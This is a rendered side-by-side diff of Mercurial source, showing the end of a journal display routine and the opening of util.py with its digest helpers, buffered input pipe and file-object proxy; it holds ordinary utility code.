510 if opts.get("commits"):
511 if fm.isplain():
511 if fm.isplain():
512 displayer = logcmdutil.changesetdisplayer(ui, repo, opts)
512 displayer = logcmdutil.changesetdisplayer(ui, repo, opts)
513 else:
513 else:
514 displayer = logcmdutil.changesetformatter(
514 displayer = logcmdutil.changesetformatter(
515 ui, repo, fm.nested('changesets'), diffopts=opts)
515 ui, repo, fm.nested('changesets'), diffopts=opts)
516 for hash in entry.newhashes:
516 for hash in entry.newhashes:
517 try:
517 try:
518 ctx = repo[hash]
518 ctx = repo[hash]
519 displayer.show(ctx)
519 displayer.show(ctx)
520 except error.RepoLookupError as e:
520 except error.RepoLookupError as e:
521 fm.plain("%s\n\n" % pycompat.bytestr(e))
521 fm.plain("%s\n\n" % pycompat.bytestr(e))
522 displayer.close()
522 displayer.close()
523
523
524 fm.end()
524 fm.end()
525
525
526 if entry is None:
526 if entry is None:
527 ui.status(_("no recorded locations\n"))
527 ui.status(_("no recorded locations\n"))
@@ -1,4021 +1,4021 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import collections
20 import collections
21 import contextlib
21 import contextlib
22 import errno
22 import errno
23 import gc
23 import gc
24 import hashlib
24 import hashlib
25 import itertools
25 import itertools
26 import mmap
26 import mmap
27 import os
27 import os
28 import platform as pyplatform
28 import platform as pyplatform
29 import re as remod
29 import re as remod
30 import shutil
30 import shutil
31 import socket
31 import socket
32 import stat
32 import stat
33 import sys
33 import sys
34 import time
34 import time
35 import traceback
35 import traceback
36 import warnings
36 import warnings
37 import zlib
37 import zlib
38
38
39 from .thirdparty import (
39 from .thirdparty import (
40 attr,
40 attr,
41 )
41 )
42 from hgdemandimport import tracing
42 from hgdemandimport import tracing
43 from . import (
43 from . import (
44 encoding,
44 encoding,
45 error,
45 error,
46 i18n,
46 i18n,
47 node as nodemod,
47 node as nodemod,
48 policy,
48 policy,
49 pycompat,
49 pycompat,
50 urllibcompat,
50 urllibcompat,
51 )
51 )
52 from .utils import (
52 from .utils import (
53 procutil,
53 procutil,
54 stringutil,
54 stringutil,
55 )
55 )
56
56
57 base85 = policy.importmod(r'base85')
57 base85 = policy.importmod(r'base85')
58 osutil = policy.importmod(r'osutil')
58 osutil = policy.importmod(r'osutil')
59 parsers = policy.importmod(r'parsers')
59 parsers = policy.importmod(r'parsers')
60
60
61 b85decode = base85.b85decode
61 b85decode = base85.b85decode
62 b85encode = base85.b85encode
62 b85encode = base85.b85encode
63
63
64 cookielib = pycompat.cookielib
64 cookielib = pycompat.cookielib
65 httplib = pycompat.httplib
65 httplib = pycompat.httplib
66 pickle = pycompat.pickle
66 pickle = pycompat.pickle
67 safehasattr = pycompat.safehasattr
67 safehasattr = pycompat.safehasattr
68 socketserver = pycompat.socketserver
68 socketserver = pycompat.socketserver
69 bytesio = pycompat.bytesio
69 bytesio = pycompat.bytesio
70 # TODO deprecate stringio name, as it is a lie on Python 3.
70 # TODO deprecate stringio name, as it is a lie on Python 3.
71 stringio = bytesio
71 stringio = bytesio
72 xmlrpclib = pycompat.xmlrpclib
72 xmlrpclib = pycompat.xmlrpclib
73
73
74 httpserver = urllibcompat.httpserver
74 httpserver = urllibcompat.httpserver
75 urlerr = urllibcompat.urlerr
75 urlerr = urllibcompat.urlerr
76 urlreq = urllibcompat.urlreq
76 urlreq = urllibcompat.urlreq
77
77
78 # workaround for win32mbcs
78 # workaround for win32mbcs
79 _filenamebytestr = pycompat.bytestr
79 _filenamebytestr = pycompat.bytestr
80
80
81 if pycompat.iswindows:
81 if pycompat.iswindows:
82 from . import windows as platform
82 from . import windows as platform
83 else:
83 else:
84 from . import posix as platform
84 from . import posix as platform
85
85
86 _ = i18n._
86 _ = i18n._
87
87
88 bindunixsocket = platform.bindunixsocket
88 bindunixsocket = platform.bindunixsocket
89 cachestat = platform.cachestat
89 cachestat = platform.cachestat
90 checkexec = platform.checkexec
90 checkexec = platform.checkexec
91 checklink = platform.checklink
91 checklink = platform.checklink
92 copymode = platform.copymode
92 copymode = platform.copymode
93 expandglobs = platform.expandglobs
93 expandglobs = platform.expandglobs
94 getfsmountpoint = platform.getfsmountpoint
94 getfsmountpoint = platform.getfsmountpoint
95 getfstype = platform.getfstype
95 getfstype = platform.getfstype
96 groupmembers = platform.groupmembers
96 groupmembers = platform.groupmembers
97 groupname = platform.groupname
97 groupname = platform.groupname
98 isexec = platform.isexec
98 isexec = platform.isexec
99 isowner = platform.isowner
99 isowner = platform.isowner
100 listdir = osutil.listdir
100 listdir = osutil.listdir
101 localpath = platform.localpath
101 localpath = platform.localpath
102 lookupreg = platform.lookupreg
102 lookupreg = platform.lookupreg
103 makedir = platform.makedir
103 makedir = platform.makedir
104 nlinks = platform.nlinks
104 nlinks = platform.nlinks
105 normpath = platform.normpath
105 normpath = platform.normpath
106 normcase = platform.normcase
106 normcase = platform.normcase
107 normcasespec = platform.normcasespec
107 normcasespec = platform.normcasespec
108 normcasefallback = platform.normcasefallback
108 normcasefallback = platform.normcasefallback
109 openhardlinks = platform.openhardlinks
109 openhardlinks = platform.openhardlinks
110 oslink = platform.oslink
110 oslink = platform.oslink
111 parsepatchoutput = platform.parsepatchoutput
111 parsepatchoutput = platform.parsepatchoutput
112 pconvert = platform.pconvert
112 pconvert = platform.pconvert
113 poll = platform.poll
113 poll = platform.poll
114 posixfile = platform.posixfile
114 posixfile = platform.posixfile
115 readlink = platform.readlink
115 readlink = platform.readlink
116 rename = platform.rename
116 rename = platform.rename
117 removedirs = platform.removedirs
117 removedirs = platform.removedirs
118 samedevice = platform.samedevice
118 samedevice = platform.samedevice
119 samefile = platform.samefile
119 samefile = platform.samefile
120 samestat = platform.samestat
120 samestat = platform.samestat
121 setflags = platform.setflags
121 setflags = platform.setflags
122 split = platform.split
122 split = platform.split
123 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
123 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
124 statisexec = platform.statisexec
124 statisexec = platform.statisexec
125 statislink = platform.statislink
125 statislink = platform.statislink
126 umask = platform.umask
126 umask = platform.umask
127 unlink = platform.unlink
127 unlink = platform.unlink
128 username = platform.username
128 username = platform.username
129
129
130 try:
130 try:
131 recvfds = osutil.recvfds
131 recvfds = osutil.recvfds
132 except AttributeError:
132 except AttributeError:
133 pass
133 pass
134
134
135 # Python compatibility
135 # Python compatibility
136
136
137 _notset = object()
137 _notset = object()
138
138
139 def bitsfrom(container):
139 def bitsfrom(container):
140 bits = 0
140 bits = 0
141 for bit in container:
141 for bit in container:
142 bits |= bit
142 bits |= bit
143 return bits
143 return bits
144
144
145 # python 2.6 still have deprecation warning enabled by default. We do not want
145 # python 2.6 still have deprecation warning enabled by default. We do not want
146 # to display anything to standard user so detect if we are running test and
146 # to display anything to standard user so detect if we are running test and
147 # only use python deprecation warning in this case.
147 # only use python deprecation warning in this case.
148 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
148 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
149 if _dowarn:
149 if _dowarn:
150 # explicitly unfilter our warning for python 2.7
150 # explicitly unfilter our warning for python 2.7
151 #
151 #
152 # The option of setting PYTHONWARNINGS in the test runner was investigated.
152 # The option of setting PYTHONWARNINGS in the test runner was investigated.
153 # However, module name set through PYTHONWARNINGS was exactly matched, so
153 # However, module name set through PYTHONWARNINGS was exactly matched, so
154 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
154 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
155 # makes the whole PYTHONWARNINGS thing useless for our usecase.
155 # makes the whole PYTHONWARNINGS thing useless for our usecase.
156 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
156 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
157 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
157 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
158 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
158 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
159 if _dowarn and pycompat.ispy3:
159 if _dowarn and pycompat.ispy3:
160 # silence warning emitted by passing user string to re.sub()
160 # silence warning emitted by passing user string to re.sub()
161 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
161 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
162 r'mercurial')
162 r'mercurial')
163 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
163 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
164 DeprecationWarning, r'mercurial')
164 DeprecationWarning, r'mercurial')
165 # TODO: reinvent imp.is_frozen()
165 # TODO: reinvent imp.is_frozen()
166 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
166 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
167 DeprecationWarning, r'mercurial')
167 DeprecationWarning, r'mercurial')
168
168
169 def nouideprecwarn(msg, version, stacklevel=1):
169 def nouideprecwarn(msg, version, stacklevel=1):
170 """Issue an python native deprecation warning
170 """Issue an python native deprecation warning
171
171
172 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
172 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
173 """
173 """
174 if _dowarn:
174 if _dowarn:
175 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
175 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
176 " update your code.)") % version
176 " update your code.)") % version
177 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
177 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
178
178
179 DIGESTS = {
179 DIGESTS = {
180 'md5': hashlib.md5,
180 'md5': hashlib.md5,
181 'sha1': hashlib.sha1,
181 'sha1': hashlib.sha1,
182 'sha512': hashlib.sha512,
182 'sha512': hashlib.sha512,
183 }
183 }
184 # List of digest types from strongest to weakest
184 # List of digest types from strongest to weakest
185 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
185 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
186
186
187 for k in DIGESTS_BY_STRENGTH:
187 for k in DIGESTS_BY_STRENGTH:
188 assert k in DIGESTS
188 assert k in DIGESTS
189
189
190 class digester(object):
190 class digester(object):
191 """helper to compute digests.
191 """helper to compute digests.
192
192
193 This helper can be used to compute one or more digests given their name.
193 This helper can be used to compute one or more digests given their name.
194
194
195 >>> d = digester([b'md5', b'sha1'])
195 >>> d = digester([b'md5', b'sha1'])
196 >>> d.update(b'foo')
196 >>> d.update(b'foo')
197 >>> [k for k in sorted(d)]
197 >>> [k for k in sorted(d)]
198 ['md5', 'sha1']
198 ['md5', 'sha1']
199 >>> d[b'md5']
199 >>> d[b'md5']
200 'acbd18db4cc2f85cedef654fccc4a4d8'
200 'acbd18db4cc2f85cedef654fccc4a4d8'
201 >>> d[b'sha1']
201 >>> d[b'sha1']
202 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
202 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
203 >>> digester.preferred([b'md5', b'sha1'])
203 >>> digester.preferred([b'md5', b'sha1'])
204 'sha1'
204 'sha1'
205 """
205 """
206
206
207 def __init__(self, digests, s=''):
207 def __init__(self, digests, s=''):
208 self._hashes = {}
208 self._hashes = {}
209 for k in digests:
209 for k in digests:
210 if k not in DIGESTS:
210 if k not in DIGESTS:
211 raise error.Abort(_('unknown digest type: %s') % k)
211 raise error.Abort(_('unknown digest type: %s') % k)
212 self._hashes[k] = DIGESTS[k]()
212 self._hashes[k] = DIGESTS[k]()
213 if s:
213 if s:
214 self.update(s)
214 self.update(s)
215
215
216 def update(self, data):
216 def update(self, data):
217 for h in self._hashes.values():
217 for h in self._hashes.values():
218 h.update(data)
218 h.update(data)
219
219
220 def __getitem__(self, key):
220 def __getitem__(self, key):
221 if key not in DIGESTS:
221 if key not in DIGESTS:
222 raise error.Abort(_('unknown digest type: %s') % k)
222 raise error.Abort(_('unknown digest type: %s') % k)
223 return nodemod.hex(self._hashes[key].digest())
223 return nodemod.hex(self._hashes[key].digest())
224
224
225 def __iter__(self):
225 def __iter__(self):
226 return iter(self._hashes)
226 return iter(self._hashes)
227
227
228 @staticmethod
228 @staticmethod
229 def preferred(supported):
229 def preferred(supported):
230 """returns the strongest digest type in both supported and DIGESTS."""
230 """returns the strongest digest type in both supported and DIGESTS."""
231
231
232 for k in DIGESTS_BY_STRENGTH:
232 for k in DIGESTS_BY_STRENGTH:
233 if k in supported:
233 if k in supported:
234 return k
234 return k
235 return None
235 return None
236
236
237 class digestchecker(object):
237 class digestchecker(object):
238 """file handle wrapper that additionally checks content against a given
238 """file handle wrapper that additionally checks content against a given
239 size and digests.
239 size and digests.
240
240
241 d = digestchecker(fh, size, {'md5': '...'})
241 d = digestchecker(fh, size, {'md5': '...'})
242
242
243 When multiple digests are given, all of them are validated.
243 When multiple digests are given, all of them are validated.
244 """
244 """
245
245
246 def __init__(self, fh, size, digests):
246 def __init__(self, fh, size, digests):
247 self._fh = fh
247 self._fh = fh
248 self._size = size
248 self._size = size
249 self._got = 0
249 self._got = 0
250 self._digests = dict(digests)
250 self._digests = dict(digests)
251 self._digester = digester(self._digests.keys())
251 self._digester = digester(self._digests.keys())
252
252
253 def read(self, length=-1):
253 def read(self, length=-1):
254 content = self._fh.read(length)
254 content = self._fh.read(length)
255 self._digester.update(content)
255 self._digester.update(content)
256 self._got += len(content)
256 self._got += len(content)
257 return content
257 return content
258
258
259 def validate(self):
259 def validate(self):
260 if self._size != self._got:
260 if self._size != self._got:
261 raise error.Abort(_('size mismatch: expected %d, got %d') %
261 raise error.Abort(_('size mismatch: expected %d, got %d') %
262 (self._size, self._got))
262 (self._size, self._got))
263 for k, v in self._digests.items():
263 for k, v in self._digests.items():
264 if v != self._digester[k]:
264 if v != self._digester[k]:
265 # i18n: first parameter is a digest name
265 # i18n: first parameter is a digest name
266 raise error.Abort(_('%s mismatch: expected %s, got %s') %
266 raise error.Abort(_('%s mismatch: expected %s, got %s') %
267 (k, v, self._digester[k]))
267 (k, v, self._digester[k]))
268
268
269 try:
269 try:
270 buffer = buffer
270 buffer = buffer
271 except NameError:
271 except NameError:
272 def buffer(sliceable, offset=0, length=None):
272 def buffer(sliceable, offset=0, length=None):
273 if length is not None:
273 if length is not None:
274 return memoryview(sliceable)[offset:offset + length]
274 return memoryview(sliceable)[offset:offset + length]
275 return memoryview(sliceable)[offset:]
275 return memoryview(sliceable)[offset:]
276
276
277 _chunksize = 4096
277 _chunksize = 4096
278
278
279 class bufferedinputpipe(object):
279 class bufferedinputpipe(object):
280 """a manually buffered input pipe
280 """a manually buffered input pipe
281
281
282 Python will not let us use buffered IO and lazy reading with 'polling' at
282 Python will not let us use buffered IO and lazy reading with 'polling' at
283 the same time. We cannot probe the buffer state and select will not detect
283 the same time. We cannot probe the buffer state and select will not detect
284 that data are ready to read if they are already buffered.
284 that data are ready to read if they are already buffered.
285
285
286 This class let us work around that by implementing its own buffering
286 This class let us work around that by implementing its own buffering
287 (allowing efficient readline) while offering a way to know if the buffer is
287 (allowing efficient readline) while offering a way to know if the buffer is
288 empty from the output (allowing collaboration of the buffer with polling).
288 empty from the output (allowing collaboration of the buffer with polling).
289
289
290 This class lives in the 'util' module because it makes use of the 'os'
290 This class lives in the 'util' module because it makes use of the 'os'
291 module from the python stdlib.
291 module from the python stdlib.
292 """
292 """
293 def __new__(cls, fh):
293 def __new__(cls, fh):
294 # If we receive a fileobjectproxy, we need to use a variation of this
294 # If we receive a fileobjectproxy, we need to use a variation of this
295 # class that notifies observers about activity.
295 # class that notifies observers about activity.
296 if isinstance(fh, fileobjectproxy):
296 if isinstance(fh, fileobjectproxy):
297 cls = observedbufferedinputpipe
297 cls = observedbufferedinputpipe
298
298
299 return super(bufferedinputpipe, cls).__new__(cls)
299 return super(bufferedinputpipe, cls).__new__(cls)
300
300
301 def __init__(self, input):
301 def __init__(self, input):
302 self._input = input
302 self._input = input
303 self._buffer = []
303 self._buffer = []
304 self._eof = False
304 self._eof = False
305 self._lenbuf = 0
305 self._lenbuf = 0
306
306
307 @property
307 @property
308 def hasbuffer(self):
308 def hasbuffer(self):
309 """True is any data is currently buffered
309 """True is any data is currently buffered
310
310
311 This will be used externally a pre-step for polling IO. If there is
311 This will be used externally a pre-step for polling IO. If there is
312 already data then no polling should be set in place."""
312 already data then no polling should be set in place."""
313 return bool(self._buffer)
313 return bool(self._buffer)
314
314
315 @property
315 @property
316 def closed(self):
316 def closed(self):
317 return self._input.closed
317 return self._input.closed
318
318
319 def fileno(self):
319 def fileno(self):
320 return self._input.fileno()
320 return self._input.fileno()
321
321
322 def close(self):
322 def close(self):
323 return self._input.close()
323 return self._input.close()
324
324
325 def read(self, size):
325 def read(self, size):
326 while (not self._eof) and (self._lenbuf < size):
326 while (not self._eof) and (self._lenbuf < size):
327 self._fillbuffer()
327 self._fillbuffer()
328 return self._frombuffer(size)
328 return self._frombuffer(size)
329
329
330 def unbufferedread(self, size):
330 def unbufferedread(self, size):
331 if not self._eof and self._lenbuf == 0:
331 if not self._eof and self._lenbuf == 0:
332 self._fillbuffer(max(size, _chunksize))
332 self._fillbuffer(max(size, _chunksize))
333 return self._frombuffer(min(self._lenbuf, size))
333 return self._frombuffer(min(self._lenbuf, size))
334
334
335 def readline(self, *args, **kwargs):
335 def readline(self, *args, **kwargs):
336 if len(self._buffer) > 1:
336 if len(self._buffer) > 1:
337 # this should not happen because both read and readline end with a
337 # this should not happen because both read and readline end with a
338 # _frombuffer call that collapse it.
338 # _frombuffer call that collapse it.
339 self._buffer = [''.join(self._buffer)]
339 self._buffer = [''.join(self._buffer)]
340 self._lenbuf = len(self._buffer[0])
340 self._lenbuf = len(self._buffer[0])
341 lfi = -1
341 lfi = -1
342 if self._buffer:
342 if self._buffer:
343 lfi = self._buffer[-1].find('\n')
343 lfi = self._buffer[-1].find('\n')
344 while (not self._eof) and lfi < 0:
344 while (not self._eof) and lfi < 0:
345 self._fillbuffer()
345 self._fillbuffer()
346 if self._buffer:
346 if self._buffer:
347 lfi = self._buffer[-1].find('\n')
347 lfi = self._buffer[-1].find('\n')
348 size = lfi + 1
348 size = lfi + 1
349 if lfi < 0: # end of file
349 if lfi < 0: # end of file
350 size = self._lenbuf
350 size = self._lenbuf
351 elif len(self._buffer) > 1:
351 elif len(self._buffer) > 1:
352 # we need to take previous chunks into account
352 # we need to take previous chunks into account
353 size += self._lenbuf - len(self._buffer[-1])
353 size += self._lenbuf - len(self._buffer[-1])
354 return self._frombuffer(size)
354 return self._frombuffer(size)
355
355
356 def _frombuffer(self, size):
356 def _frombuffer(self, size):
357 """return at most 'size' data from the buffer
357 """return at most 'size' data from the buffer
358
358
359 The data are removed from the buffer."""
359 The data are removed from the buffer."""
360 if size == 0 or not self._buffer:
360 if size == 0 or not self._buffer:
361 return ''
361 return ''
362 buf = self._buffer[0]
362 buf = self._buffer[0]
363 if len(self._buffer) > 1:
363 if len(self._buffer) > 1:
364 buf = ''.join(self._buffer)
364 buf = ''.join(self._buffer)
365
365
366 data = buf[:size]
366 data = buf[:size]
367 buf = buf[len(data):]
367 buf = buf[len(data):]
368 if buf:
368 if buf:
369 self._buffer = [buf]
369 self._buffer = [buf]
370 self._lenbuf = len(buf)
370 self._lenbuf = len(buf)
371 else:
371 else:
372 self._buffer = []
372 self._buffer = []
373 self._lenbuf = 0
373 self._lenbuf = 0
374 return data
374 return data
375
375
376 def _fillbuffer(self, size=_chunksize):
376 def _fillbuffer(self, size=_chunksize):
377 """read data to the buffer"""
377 """read data to the buffer"""
378 data = os.read(self._input.fileno(), size)
378 data = os.read(self._input.fileno(), size)
379 if not data:
379 if not data:
380 self._eof = True
380 self._eof = True
381 else:
381 else:
382 self._lenbuf += len(data)
382 self._lenbuf += len(data)
383 self._buffer.append(data)
383 self._buffer.append(data)
384
384
385 return data
385 return data
386
386
387 def mmapread(fp):
387 def mmapread(fp):
388 try:
388 try:
389 fd = getattr(fp, 'fileno', lambda: fp)()
389 fd = getattr(fp, 'fileno', lambda: fp)()
390 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
390 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
391 except ValueError:
391 except ValueError:
392 # Empty files cannot be mmapped, but mmapread should still work. Check
392 # Empty files cannot be mmapped, but mmapread should still work. Check
393 # if the file is empty, and if so, return an empty buffer.
393 # if the file is empty, and if so, return an empty buffer.
394 if os.fstat(fd).st_size == 0:
394 if os.fstat(fd).st_size == 0:
395 return ''
395 return ''
396 raise
396 raise
397
397
398 class fileobjectproxy(object):
398 class fileobjectproxy(object):
399 """A proxy around file objects that tells a watcher when events occur.
399 """A proxy around file objects that tells a watcher when events occur.
400
400
401 This type is intended to only be used for testing purposes. Think hard
401 This type is intended to only be used for testing purposes. Think hard
402 before using it in important code.
402 before using it in important code.
403 """
403 """
404 __slots__ = (
404 __slots__ = (
405 r'_orig',
405 r'_orig',
406 r'_observer',
406 r'_observer',
407 )
407 )
408
408
409 def __init__(self, fh, observer):
409 def __init__(self, fh, observer):
410 object.__setattr__(self, r'_orig', fh)
410 object.__setattr__(self, r'_orig', fh)
411 object.__setattr__(self, r'_observer', observer)
411 object.__setattr__(self, r'_observer', observer)
412
412
413 def __getattribute__(self, name):
413 def __getattribute__(self, name):
414 ours = {
414 ours = {
415 r'_observer',
415 r'_observer',
416
416
417 # IOBase
417 # IOBase
418 r'close',
418 r'close',
419 # closed if a property
419 # closed if a property
420 r'fileno',
420 r'fileno',
421 r'flush',
421 r'flush',
422 r'isatty',
422 r'isatty',
423 r'readable',
423 r'readable',
424 r'readline',
424 r'readline',
425 r'readlines',
425 r'readlines',
426 r'seek',
426 r'seek',
427 r'seekable',
427 r'seekable',
428 r'tell',
428 r'tell',
429 r'truncate',
429 r'truncate',
430 r'writable',
430 r'writable',
431 r'writelines',
431 r'writelines',
432 # RawIOBase
432 # RawIOBase
433 r'read',
433 r'read',
434 r'readall',
434 r'readall',
435 r'readinto',
435 r'readinto',
436 r'write',
436 r'write',
437 # BufferedIOBase
437 # BufferedIOBase
438 # raw is a property
438 # raw is a property
439 r'detach',
439 r'detach',
440 # read defined above
440 # read defined above
441 r'read1',
441 r'read1',
442 # readinto defined above
442 # readinto defined above
443 # write defined above
443 # write defined above
444 }
444 }
445
445
446 # We only observe some methods.
446 # We only observe some methods.
447 if name in ours:
447 if name in ours:
448 return object.__getattribute__(self, name)
448 return object.__getattribute__(self, name)
449
449
450 return getattr(object.__getattribute__(self, r'_orig'), name)
450 return getattr(object.__getattribute__(self, r'_orig'), name)
451
451
452 def __nonzero__(self):
452 def __nonzero__(self):
453 return bool(object.__getattribute__(self, r'_orig'))
453 return bool(object.__getattribute__(self, r'_orig'))
454
454
455 __bool__ = __nonzero__
455 __bool__ = __nonzero__
456
456
457 def __delattr__(self, name):
457 def __delattr__(self, name):
458 return delattr(object.__getattribute__(self, r'_orig'), name)
458 return delattr(object.__getattribute__(self, r'_orig'), name)
459
459
460 def __setattr__(self, name, value):
460 def __setattr__(self, name, value):
461 return setattr(object.__getattribute__(self, r'_orig'), name, value)
461 return setattr(object.__getattribute__(self, r'_orig'), name, value)
462
462
463 def __iter__(self):
463 def __iter__(self):
464 return object.__getattribute__(self, r'_orig').__iter__()
464 return object.__getattribute__(self, r'_orig').__iter__()
465
465
466 def _observedcall(self, name, *args, **kwargs):
466 def _observedcall(self, name, *args, **kwargs):
467 # Call the original object.
467 # Call the original object.
468 orig = object.__getattribute__(self, r'_orig')
468 orig = object.__getattribute__(self, r'_orig')
469 res = getattr(orig, name)(*args, **kwargs)
469 res = getattr(orig, name)(*args, **kwargs)
470
470
471 # Call a method on the observer of the same name with arguments
471 # Call a method on the observer of the same name with arguments
472 # so it can react, log, etc.
472 # so it can react, log, etc.
473 observer = object.__getattribute__(self, r'_observer')
473 observer = object.__getattribute__(self, r'_observer')
474 fn = getattr(observer, name, None)
474 fn = getattr(observer, name, None)
475 if fn:
475 if fn:
476 fn(res, *args, **kwargs)
476 fn(res, *args, **kwargs)
477
477
478 return res
478 return res
479
479
480 def close(self, *args, **kwargs):
480 def close(self, *args, **kwargs):
481 return object.__getattribute__(self, r'_observedcall')(
481 return object.__getattribute__(self, r'_observedcall')(
482 r'close', *args, **kwargs)
482 r'close', *args, **kwargs)
483
483
484 def fileno(self, *args, **kwargs):
484 def fileno(self, *args, **kwargs):
485 return object.__getattribute__(self, r'_observedcall')(
485 return object.__getattribute__(self, r'_observedcall')(
486 r'fileno', *args, **kwargs)
486 r'fileno', *args, **kwargs)
487
487
488 def flush(self, *args, **kwargs):
488 def flush(self, *args, **kwargs):
489 return object.__getattribute__(self, r'_observedcall')(
489 return object.__getattribute__(self, r'_observedcall')(
490 r'flush', *args, **kwargs)
490 r'flush', *args, **kwargs)
491
491
492 def isatty(self, *args, **kwargs):
492 def isatty(self, *args, **kwargs):
493 return object.__getattribute__(self, r'_observedcall')(
493 return object.__getattribute__(self, r'_observedcall')(
494 r'isatty', *args, **kwargs)
494 r'isatty', *args, **kwargs)
495
495
496 def readable(self, *args, **kwargs):
496 def readable(self, *args, **kwargs):
497 return object.__getattribute__(self, r'_observedcall')(
497 return object.__getattribute__(self, r'_observedcall')(
498 r'readable', *args, **kwargs)
498 r'readable', *args, **kwargs)
499
499
500 def readline(self, *args, **kwargs):
500 def readline(self, *args, **kwargs):
501 return object.__getattribute__(self, r'_observedcall')(
501 return object.__getattribute__(self, r'_observedcall')(
502 r'readline', *args, **kwargs)
502 r'readline', *args, **kwargs)
503
503
504 def readlines(self, *args, **kwargs):
504 def readlines(self, *args, **kwargs):
505 return object.__getattribute__(self, r'_observedcall')(
505 return object.__getattribute__(self, r'_observedcall')(
506 r'readlines', *args, **kwargs)
506 r'readlines', *args, **kwargs)
507
507
508 def seek(self, *args, **kwargs):
508 def seek(self, *args, **kwargs):
509 return object.__getattribute__(self, r'_observedcall')(
509 return object.__getattribute__(self, r'_observedcall')(
510 r'seek', *args, **kwargs)
510 r'seek', *args, **kwargs)
511
511
512 def seekable(self, *args, **kwargs):
512 def seekable(self, *args, **kwargs):
513 return object.__getattribute__(self, r'_observedcall')(
513 return object.__getattribute__(self, r'_observedcall')(
514 r'seekable', *args, **kwargs)
514 r'seekable', *args, **kwargs)
515
515
516 def tell(self, *args, **kwargs):
516 def tell(self, *args, **kwargs):
517 return object.__getattribute__(self, r'_observedcall')(
517 return object.__getattribute__(self, r'_observedcall')(
518 r'tell', *args, **kwargs)
518 r'tell', *args, **kwargs)
519
519
520 def truncate(self, *args, **kwargs):
520 def truncate(self, *args, **kwargs):
521 return object.__getattribute__(self, r'_observedcall')(
521 return object.__getattribute__(self, r'_observedcall')(
522 r'truncate', *args, **kwargs)
522 r'truncate', *args, **kwargs)
523
523
524 def writable(self, *args, **kwargs):
524 def writable(self, *args, **kwargs):
525 return object.__getattribute__(self, r'_observedcall')(
525 return object.__getattribute__(self, r'_observedcall')(
526 r'writable', *args, **kwargs)
526 r'writable', *args, **kwargs)
527
527
528 def writelines(self, *args, **kwargs):
528 def writelines(self, *args, **kwargs):
529 return object.__getattribute__(self, r'_observedcall')(
529 return object.__getattribute__(self, r'_observedcall')(
530 r'writelines', *args, **kwargs)
530 r'writelines', *args, **kwargs)
531
531
532 def read(self, *args, **kwargs):
532 def read(self, *args, **kwargs):
533 return object.__getattribute__(self, r'_observedcall')(
533 return object.__getattribute__(self, r'_observedcall')(
534 r'read', *args, **kwargs)
534 r'read', *args, **kwargs)
535
535
536 def readall(self, *args, **kwargs):
536 def readall(self, *args, **kwargs):
537 return object.__getattribute__(self, r'_observedcall')(
537 return object.__getattribute__(self, r'_observedcall')(
538 r'readall', *args, **kwargs)
538 r'readall', *args, **kwargs)
539
539
540 def readinto(self, *args, **kwargs):
540 def readinto(self, *args, **kwargs):
541 return object.__getattribute__(self, r'_observedcall')(
541 return object.__getattribute__(self, r'_observedcall')(
542 r'readinto', *args, **kwargs)
542 r'readinto', *args, **kwargs)
543
543
544 def write(self, *args, **kwargs):
544 def write(self, *args, **kwargs):
545 return object.__getattribute__(self, r'_observedcall')(
545 return object.__getattribute__(self, r'_observedcall')(
546 r'write', *args, **kwargs)
546 r'write', *args, **kwargs)
547
547
548 def detach(self, *args, **kwargs):
548 def detach(self, *args, **kwargs):
549 return object.__getattribute__(self, r'_observedcall')(
549 return object.__getattribute__(self, r'_observedcall')(
550 r'detach', *args, **kwargs)
550 r'detach', *args, **kwargs)
551
551
552 def read1(self, *args, **kwargs):
552 def read1(self, *args, **kwargs):
553 return object.__getattribute__(self, r'_observedcall')(
553 return object.__getattribute__(self, r'_observedcall')(
554 r'read1', *args, **kwargs)
